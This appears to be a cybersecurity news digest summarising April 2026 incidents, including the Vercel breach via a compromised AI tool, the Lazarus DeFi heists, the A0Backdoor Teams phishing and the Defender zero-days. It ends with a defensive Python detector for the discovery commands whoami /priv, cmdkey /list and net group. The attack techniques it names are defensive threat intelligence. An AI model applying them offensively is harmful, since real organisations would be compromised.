A former incident response negotiator pleaded guilty to conspiring with BlackCat (ALPHV) ransomware affiliates to extort U.S. organizations between 2023 and 2025. The defendant, Angelo Martino, shared confidential victim negotiation positions and insurance policy limits with the ransomware operators to maximize payouts. At least five U.S. organizations were victimized, including a financial services firm that paid $25.66 million and a nonprofit that paid $26.79 million. The operation involved a 20% revenue share paid to BlackCat administrators for access to the ransomware and extortion infrastructure.

Compromise of Third-Party AI Tool via Infostealer Leads to Vercel Breach and OAuth Token Theft Chain

Updated: 21.04.2026 12:10 · First: 21.04.2026 00:01 · 📰 2 src / 2 articles

Vercel confirmed a cyber-incident in which an attacker gained access to internal environments and non-sensitive environment variables through Context.ai, a third-party AI tool used by a Vercel employee. Context.ai had itself been compromised via an infostealer delivered through a gaming cheat script; the attackers stole OAuth tokens from its users, including one tied to a Vercel employee's Google Workspace account that carried broad permissions, and used it to reach Vercel's environments. Context.ai acknowledged the token theft and said some consumer tokens were likely compromised. Vercel said some customer environment variables may have been exposed but found no evidence that sensitive environment variables were accessed, that npm packages were compromised, or that projects such as Next.js were affected. A threat actor allegedly linked to ShinyHunters claimed access and attempted to extort Vercel for $2 million; Vercel is still validating those claims. The company is working with Mandiant on incident response, has notified affected customers, and is urging MFA enforcement and credential rotation given the potential for downstream credential compromise.

Drift Protocol administrative takeover and $285 million loss via Security Council manipulation on Solana

Updated: 21.04.2026 01:23 · First: 02.04.2026 22:03 · 📰 4 src / 4 articles

The April 1, 2026, $285 million Drift Protocol loss was part of a broader campaign by North Korea-linked Lazarus Group (TraderTraitor) targeting DeFi protocols. On April 18, 2026, the group executed a $290 million heist against KelpDAO by exploiting its cross-chain verification layer (DVN) via compromised RPC nodes, falsified data injection, and DDoS attacks, laundering funds through Tornado Cash. The attack paused KelpDAO’s rsETH contracts, froze Aave’s rsETH collateral usage, and was isolated to rsETH without broader contagion. Drift Protocol’s Security Council hijacking, attributed to UNC4736 (AppleJeus/Labyrinth Chollima), and KelpDAO’s DVN compromise both align with Lazarus Group’s pattern of sophisticated state-sponsored attacks on DeFi infrastructure.

Critical vulnerabilities and embedded risks in serial-to-IP industrial converters disclosed

Updated: · First: 21.04.2026 00:00 · 📰 1 src / 1 articles

Security researchers disclosed 20 new vulnerabilities across popular serial-to-IP converter models used in industrial networks, including multiple critical remote code execution (RCE) flaws with CVSS ratings up to 9.8. Thousands of additional known vulnerabilities were identified in the devices' underlying software stacks, which rely on outdated libraries and end-of-life operating systems. Serial-to-IP converters bridge legacy industrial machinery with modern networks, which makes them attractive targets in OT attacks such as the 2015 Ukrainian power grid incident. Because they underpin SCADA connectivity and remote monitoring, industry projections expect the market for these devices to grow over the next decade, widening the exposed attack surface. The research highlights systemic deficiencies, including unpatched firmware, a lack of binary hardening, and exploitable default configurations.

Shopify customer database compromise at Seiko USA following website defacement

Updated: · First: 20.04.2026 21:22 · 📰 1 src / 1 articles

Seiko USA's website was defaced over the weekend with a ransom demand claiming the theft of its Shopify customer database. Visitors to the Press Lounge section encountered an attacker-controlled page alleging full compromise of the company's Shopify backend. The threat actors threatened to publish the data unless a ransom was paid within 72 hours. The claimed dataset includes names, email addresses, phone numbers, order history, transaction details, shipping addresses, shipping preferences, account creation dates, and customer notes. To support their claim, the attackers cited a specific Shopify account ID and instructed Seiko USA to negotiate via an email address they had added to that account. Seiko USA has since removed the defacement but has not publicly confirmed the incident.

A0Backdoor Malware Deployed via Microsoft Teams Phishing Campaign

Updated: 20.04.2026 18:11 · First: 10.03.2026 00:50 · 📰 2 src / 2 articles

A phishing campaign targeting financial and healthcare organizations uses Microsoft Teams to impersonate IT staff and trick victims into starting Quick Assist remote-access sessions, through which the A0Backdoor malware is deployed. The campaign, linked to the BlackBasta ransomware group, uses TTPs including digitally signed MSI installers, DNS MX-record-based C2 communication, and DLL sideloading with legitimate Microsoft binaries. Its multi-stage chain begins with external Teams chats impersonating IT staff to initiate Quick Assist; after gaining access, the operators perform reconnaissance, deploy payloads via DLL sideloading against signed applications, and use Windows Remote Management (WinRM) for lateral movement. Targeted exfiltration uses tools such as Rclone to push sensitive data to external cloud storage, blending the activity with legitimate administrative operations.

Microsoft March and April 2026 Patch Tuesdays Address Multiple Zero-Days and Critical Flaws

Updated: 22.04.2026 11:08 · First: 10.03.2026 19:49 · 📰 13 src / 13 articles

Microsoft's April 2026 Patch Tuesday release addresses 167 security vulnerabilities in Windows and related software, including two actively exploited zero-days: CVE-2026-32201 in SharePoint Server and CVE-2026-33825 in Microsoft Defender. Nearly 60% of the patched flaws are elevation-of-privilege bugs, the highest proportion in eight months, and eight are rated Critical, including unauthenticated remote code execution flaws in Windows IKE Service Extensions (CVE-2026-33824, CVSS 9.8) and secure tunneling components (CVE-2026-33827, CVSS 8.1).

Since the April updates shipped, threat actors have been exploiting two additional, still unpatched Microsoft Defender zero-days, RedSun and UnDefend, alongside the patched CVE-2026-33825 (BlueHammer). Exploitation has been observed since April 10, 2026, with RedSun and UnDefend PoCs deployed on April 16, 2026, followed by hands-on-keyboard discovery commands such as whoami /priv, cmdkey /list, and net group. Huntress confirmed real-world exploitation and isolated compromised systems to limit post-exploitation damage; the flaws have also been chained with other vulnerabilities to gain full endpoint control.

Separately, Microsoft issued out-of-band emergency patches for CVE-2026-40372, a critical privilege escalation vulnerability in the ASP.NET Core Data Protection cryptographic APIs. The flaw, a regression in the Microsoft.AspNetCore.DataProtection 10.0.0 through 10.0.6 packages, lets unauthenticated attackers escalate privileges by forging authentication cookies; Microsoft recommends updating to version 10.0.7 and rotating the Data Protection key ring to fully remediate.

The April updates shipped as Windows 11 cumulative updates KB5083769 (for 25H2 and 24H2) and KB5082052 (for 23H2), moving builds to 26200.8246 (25H2), 26100.8246 (24H2), and 22631.6936 (23H2). Windows 10 Enterprise LTSC and ESU participants received the April fixes via KB5082200, which updates to build 19045.7184 (Windows 10) or 19044.7184 (Windows 10 Enterprise LTSC 2021).
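As an added example (not Huntress's detection logic), the following Python correlates the three discovery commands the summary names, whoami /priv, cmdkey /list and net group, across process-creation events and raises one alert per host that runs at least two distinct ones within a ten-minute window. The events are constructed, and the window size and threshold are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands named in the summary. Patterns run against a normalized
# command line (executable basename, lowercase, single spaces), so
# "C:\Windows\System32\whoami.exe  /PRIV" and "whoami /priv" both match.
DISCOVERY = {
    "whoami /priv": re.compile(r"^whoami(\.exe)? /priv\b"),
    "cmdkey /list": re.compile(r"^cmdkey(\.exe)? /list\b"),
    "net group":    re.compile(r"^net1?(\.exe)? group\b"),
}
WINDOW = timedelta(minutes=10)  # assumption: correlation span, tune per environment
MIN_DISTINCT = 2                # assumption: distinct discovery commands before alerting


def normalize(cmdline: str) -> str:
    parts = cmdline.strip().split()
    if not parts:
        return ""
    exe = parts[0].strip('"').rsplit("\\", 1)[-1].lower()
    return " ".join([exe, *(p.lower() for p in parts[1:])])


def classify(cmdline: str):
    """Return the discovery-command label for a command line, or None."""
    norm = normalize(cmdline)
    for label, pattern in DISCOVERY.items():
        if pattern.search(norm):
            return label
    return None


def correlate(events):
    """events: iterable of (timestamp, host, user, command_line).
    Returns one alert per host for which at least MIN_DISTINCT distinct
    discovery commands fall inside some WINDOW-long span."""
    per_host = defaultdict(list)
    for ts, host, user, cmd in events:
        label = classify(cmd)
        if label:
            per_host[host].append((ts, label, user))
    alerts = []
    for host, seq in per_host.items():
        seq.sort()
        best = None
        for i, (end_ts, _, user) in enumerate(seq):
            # every discovery command on this host within WINDOW before end_ts
            labels = {lbl for t, lbl, _ in seq[: i + 1] if end_ts - t <= WINDOW}
            if len(labels) >= MIN_DISTINCT and (best is None or len(labels) > len(best["commands"])):
                best = {"host": host, "user": user, "last_seen": end_ts, "commands": sorted(labels)}
        if best:
            alerts.append(best)
    return alerts


T = datetime.fromisoformat
# Constructed process-creation events (not real telemetry): WS-01 runs the full
# triad inside three minutes, WS-02 a lone whoami, WS-03 two commands hours apart.
SAMPLE_EVENTS = [
    (T("2026-04-16T09:02:11"), "WS-01", "CORP\\jdoe", r"C:\Windows\System32\whoami.exe /priv"),
    (T("2026-04-16T09:03:40"), "WS-01", "CORP\\jdoe", "cmdkey /list"),
    (T("2026-04-16T09:05:02"), "WS-01", "CORP\\jdoe", r'net group "Domain Admins" /domain'),
    (T("2026-04-16T09:10:00"), "WS-02", "CORP\\asmith", "whoami /priv"),
    (T("2026-04-16T09:11:30"), "WS-02", "CORP\\asmith", r'"C:\Program Files\App\app.exe" --update'),
    (T("2026-04-16T08:00:00"), "WS-03", "CORP\\svc_bk", "cmdkey /list"),
    (T("2026-04-16T11:30:00"), "WS-03", "CORP\\svc_bk", "net1 group"),
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"{a['host']} {a['user']} last seen {a['last_seen']}: {', '.join(a['commands'])}")
```

A single whoami /priv is routine on administrator workstations, which is why the rule counts distinct commands in a short span rather than matching each on its own. Pair it with the Defender-specific indicators from the vendor write-ups: the command triad is generic post-exploitation behaviour and not unique to RedSun, UnDefend or BlueHammer.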